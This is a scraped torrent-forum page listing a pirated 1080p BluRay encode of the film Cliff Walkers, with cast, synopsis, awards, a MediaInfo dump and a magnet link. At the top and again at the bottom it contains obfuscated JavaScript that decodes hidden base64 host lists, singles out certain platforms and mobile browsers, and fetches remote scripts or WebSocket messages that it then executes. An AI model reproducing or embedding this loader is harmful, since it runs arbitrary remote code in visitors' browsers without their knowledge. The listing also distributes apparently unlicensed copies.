悬崖之上[国语音轨/双语字幕].Cliff.Walkers.2021.1080p.BluRay.x265.10bit.MNHD 7.04GB

版主小s 1月前 210

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 悬崖之上 / Impasse / Cliff Walkers

◎年 代 2021

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 动作 / 悬疑

◎语 言 汉语普通话 / 英语 / 俄语

◎上映日期 2021-04-30(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt11448076/

◎豆瓣评分 7.6/10 (569080人评价)

◎豆瓣链接 https://movie.douban.com/subject/32493124/

◎片 长 120分钟

◎导 演 张艺谋 Yimou Zhang (id:1054398)

◎编 剧 全勇先 Yongxian Quan (id:1318171)

张艺谋 Yimou Zhang (id:1054398)

潘依然 Yiran Pan (id:1405343)

◎演 员 张译 Yi Zhang (id:1274761)

于和伟 Hewei Yu (id:1313742)

秦海璐 Hailu Qin (id:1274437)

朱亚文 Yawen Zhu (id:1312699)

刘浩存 Haocun Liu (id:1410267)

倪大红 Dahong Ni (id:1274306)

李乃文 Naiwen Li (id:1274530)

余皑磊 Ailei Yu (id:1313809)

飞凡 Fan Fei (id:1442404)

雷佳音 Jiayin Lei (id:1312940)

沙溢 Yi Sha (id:1274648)

韩昊霖 Haolin Han (id:1396506)

赵毅 Yi Zhao (id:1314844)

安冬 Dong An (id:1373336)

封新天 Xintian Feng (id:1451203)

齐羽嘉 Yujia Qi (id:1416332)

芮丹尼 Danny Ray (id:1391362)

纪焕博 Rock Ji (id:1321846)

马睿瀚 Ruihan Ma (id:1390556)

松天硕 Tianshuo Song (id:1403108)

牛晓宁 Xiaoning Niu (id:1461348)

丁子迪 Zidi Ding (id:1365828)

白恩 En Bai (id:1327332)

逯长恩 Chang'en Lu (id:1325615)

袁红阳 Hongyang Yuan (id:1461388)

陈语桐 Yutong Chen (id:1461298)

燕磊 Lei Yan (id:1461387)

曹瑞 Rui Cao (id:1367528)

陈永胜 Yongsheng Chen (id:1436031)

王乃训 Naixun Wang (id:1386026)

冯瓅 Li Feng (id:1319504)

焦宏奋 Hongfen Jiao (id:1412277)

杨受成 Albert Yeung (id:1313455)

傅若清 Ruoqing Fu (id:1417588)

庞丽薇 Liwei Pang (id:1406322)

梁琳 Lin Liang (id:1400716)

杨政龙 Zhenglong Yang (id:1442412)

梁郁 Yu Liang (id:1442414)

李捷 Jie Li (id:1403835)

于晓楠 Xiaonan Yu (id:1417264)

马寅 Yin Ma (id:1402444)

王垂林 Chuilin Wang (id:1446629)

叶蓁蓁 Zhenzhen Ye (id:1453514)

彭鸣宇 Mingyu Peng (id:1446113)

赵海城 Haicheng Zhao (id:1392082)

王隽 Jun Wang (id:1448949)

许建海 Jianhai Xu (id:1384186)

邵剑秋 Kim-Chau Shiu (id:1413263)

曹永旭 Yeong-wook Jo (id:1287735)

周深 Shen Zhou (id:1366895)

赵小丁 Xiaoding Zhao (id:1274347)

赵显章 Xianzhang Zhao (id:1406352)

柴戎 Rong Chai (id:1462739)

李永一 Yongyi Li (id:1379294)

付璐璐 Lulu Fu (id:1401800)

林木 Lin Mu (id:1325046)

李言 Yan Li (id:1456204)

崔曜琛 YC (id:1461410)

陈敏正 Minzheng Chen (id:1346314)

梁郁 Yu Liang (id:1442414)

李伟 Wei Li (id:1447836)

任茂成 Maocheng Ren (id:1401816)

杨江 Jiang Yang (id:1351381)

赵楠 Nan Zhao (id:1325307)

王星会 Samson Sing Wun Wong (id:1401244)

郑斗洪 Doo-hong Jung (id:1109833)

◎标 签 谍战 / 张艺谋 / 悬疑 / 于和伟 / 剧情 / 中国大陆 / 2021 / 刘浩存

◎简 介

上世纪三十年代,四位曾在苏联接受特训的共产党特工组成任务小队,回国执行代号为“乌特拉”的秘密行动。由于叛徒的出卖,他们从跳伞降落的第一刻起, 就已置身于敌人布下的罗网之中。同志能否脱身,任务能否完成,雪一直下,立于“悬崖之上”的行动小组面临严峻考验。

◎获奖情况 (共6项)

第15届亚洲电影大奖 (2021)

最佳男配角(提名)

└──余皑磊 (id:1313809)

最佳女配角(提名)

└──秦海璐 (id:1274437)

最佳摄影(提名)

└──赵小丁 (id:1274347)

最佳剪接(提名)

└──李永一 (id:1379294)

最佳原创音乐(提名)

└──曹永旭 (id:1287735)

最佳造型设计(提名)

└──陈敏正 (id:1346314)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 261776495872249608498006856373370659955 (0xC4F051B7FD688D443ADFC76BC8BCA473)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.04 GiB

  8. Duration : 2 h 0 min

  9. Overall bit rate : 8 335 kb/s

  10. Movie name : Cliff Walkers [2021] BluRay 1080p [email protected]

  11. Encoded date : UTC 2021-10-02 03:31:40

  12. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 0 min

  21. Bit rate : 7 701 kb/s

  22. Width : 1 920 pixels

  23. Height : 812 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.206

  31. Stream size : 6.47 GiB (92%)

  32. Writing library : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x812 / interlace=0 / total-frames=173222 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=20.7 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No

  36. Color range : Limited

  37. Color primaries : BT.709

  38. Transfer characteristics : BT.709

  39. Matrix coefficients : BT.709


  40. Audio

  41. ID : 2

  42. Format : AC-3

  43. Format/Info : Audio Coding 3

  44. Commercial name : Dolby Digital

  45. Codec ID : A_AC3

  46. Duration : 2 h 0 min

  47. Bit rate mode : Constant

  48. Bit rate : 640 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : L R C LFE Ls Rs

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 31.250 FPS (1536 SPF)

  53. Compression mode : Lossy

  54. Stream size : 551 MiB (8%)

  55. Language : Chinese

  56. Service kind : Complete Main

  57. Default : Yes

  58. Forced : No


  59. Text #1

  60. ID : 3

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 2 h 0 min

  66. Bit rate : 11.5 kb/s

  67. Count of elements : 2066

  68. Stream size : 9.95 MiB (0%)

  69. Title : CHS

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No


  73. Text #2

  74. ID : 4

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 2 h 0 min

  80. Bit rate : 11.9 kb/s

  81. Count of elements : 2066

  82. Stream size : 10.3 MiB (0%)

  83. Title : CHT

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Text #3

  88. ID : 5

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 2 h 0 min

  94. Bit rate : 17.9 kb/s

  95. Count of elements : 2066

  96. Stream size : 15.4 MiB (0%)

  97. Title : CHS&ENG

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Text #4

  102. ID : 6

  103. Format : PGS

  104. Muxing mode : zlib

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 2 h 0 min

  108. Bit rate : 18.3 kb/s

  109. Count of elements : 2066

  110. Stream size : 15.8 MiB (0%)

  111. Title : CHT&ENG

  112. Language : Chinese

  113. Default : No

  114. Forced : No


  115. Menu

  116. 00:00:00.000 : en:Chapter 01

  117. 00:06:37.792 : en:Chapter 02

  118. 00:13:11.667 : en:Chapter 03

  119. 00:31:31.708 : en:Chapter 04

  120. 00:39:52.625 : en:Chapter 05

  121. 00:45:52.792 : en:Chapter 06

  122. 01:01:04.625 : en:Chapter 07

  123. 01:21:12.667 : en:Chapter 08

  124. 01:29:08.167 : en:Chapter 09

  125. 01:39:49.458 : en:Chapter 10

  126. 01:49:38.000 : en:Chapter 11

  127. 01:53:54.958 : en:Chapter 12




复制代码


TAGS 动作 剧情 悬疑

磁力链:
  • magnet:?xt=urn:btih:E40FC6D564DD0FEA105AC0FF8F33440C75BD041D

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};